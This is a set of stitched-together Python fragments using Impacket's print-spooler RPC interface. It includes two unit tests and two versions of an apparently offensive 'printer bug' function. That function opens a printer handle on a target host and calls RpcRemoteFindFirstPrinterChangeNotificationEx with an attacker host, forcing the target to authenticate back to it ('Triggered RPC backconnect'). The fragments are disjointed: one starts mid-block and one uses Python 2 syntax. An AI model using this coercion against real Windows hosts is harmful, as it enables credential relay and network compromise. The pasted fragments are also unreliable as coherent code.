def test_RpcRemoteFindFirstPrinterChangeNotificationEx(self): dce, rpctransport = self.connect() request = rprn.RpcOpenPrinter() request['pPrinterName'] = '\\\\%s\x00' % self.machine request['pDatatype'] = NULL request['pDevModeContainer']['pDevMode'] = NULL request[ 'AccessRequired'] = rprn.SERVER_READ | rprn.SERVER_ALL_ACCESS | rprn.SERVER_ACCESS_ADMINISTER request.dump() resp = dce.request(request) resp.dump() request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx() request['hPrinter'] = resp['pHandle'] request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB request['pszLocalMachine'] = '\\\\%s\x00' % self.machine request['pOptions'] = NULL request.dump() try: resp = dce.request(request) resp.dump() except Exception as e: if str(e).find('ERROR_INVALID_HANDLE') < 0: raise
def lookup(self, rpctransport, host): if self.__tcp_ping and self.ping(host) is False: logging.info("Host is offline. Skipping!") return dce = rpctransport.get_dce_rpc() try: dce.connect() except Exception as e: # Probably this isn't a Windows machine or SMB is closed logging.error("Timeout - Skipping host!") return dce.bind(rprn.MSRPC_UUID_RPRN) logging.info('Bind OK') try: resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host) except Exception as e: if str(e).find('Broken pipe') >= 0: # The connection timed-out. Let's try to bring it back next round logging.error('Connection failed - skipping host!') return elif str(e).upper().find('ACCESS_DENIED'): # We're not admin, bye logging.error('Access denied - RPC call was denied') dce.disconnect() return else: raise logging.info('Got handle') request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx() request['hPrinter'] = resp['pHandle'] request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB request['pszLocalMachine'] = '\\\\%s\x00' % self.__attackerhost request['pOptions'] = NULL try: resp = dce.request(request) except Exception as e: print(e) logging.info( 'Triggered RPC backconnect, this may or may not have worked') dce.disconnect() return None
def test_RpcRemoteFindFirstPrinterChangeNotificationEx(self): dce, rpctransport = self.connect() request = rprn.RpcOpenPrinter() request['pPrinterName'] = "\\\\%s\x00" % self.machine request['pDatatype'] = NULL request['pDevModeContainer']['pDevMode'] = NULL request[ 'AccessRequired'] = rprn.SERVER_READ | rprn.SERVER_ALL_ACCESS | rprn.SERVER_ACCESS_ADMINISTER request.dump() resp = dce.request(request) resp.dump() request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx() request['hPrinter'] = resp['pHandle'] request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB request['pszLocalMachine'] = "\\\\%s\x00" % self.machine request['pOptions'] = NULL request.dump() with assertRaisesRegex(self, rprn.DCERPCSessionError, "ERROR_INVALID_HANDLE"): dce.request(request)
resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host) except Exception, e: if str(e).find('Broken pipe') >= 0: # The connection timed-out. Let's try to bring it back next round logging.error('Connection failed - skipping host!') return False elif str(e).upper().find('ACCESS_DENIED'): # We're not admin, bye logging.error('Access denied - RPC call was denied') dce.disconnect() return False else: return False logging.info('Got handle') request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx() request['hPrinter'] = resp['pHandle'] request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB request['pszLocalMachine'] = '\\\\%s\x00' % self.__attackerhost request['pOptions'] = NULL try: resp = dce.request(request) except Exception as e: pass logging.info( 'Triggered RPC backconnect, this may or may not have worked') dce.disconnect() return True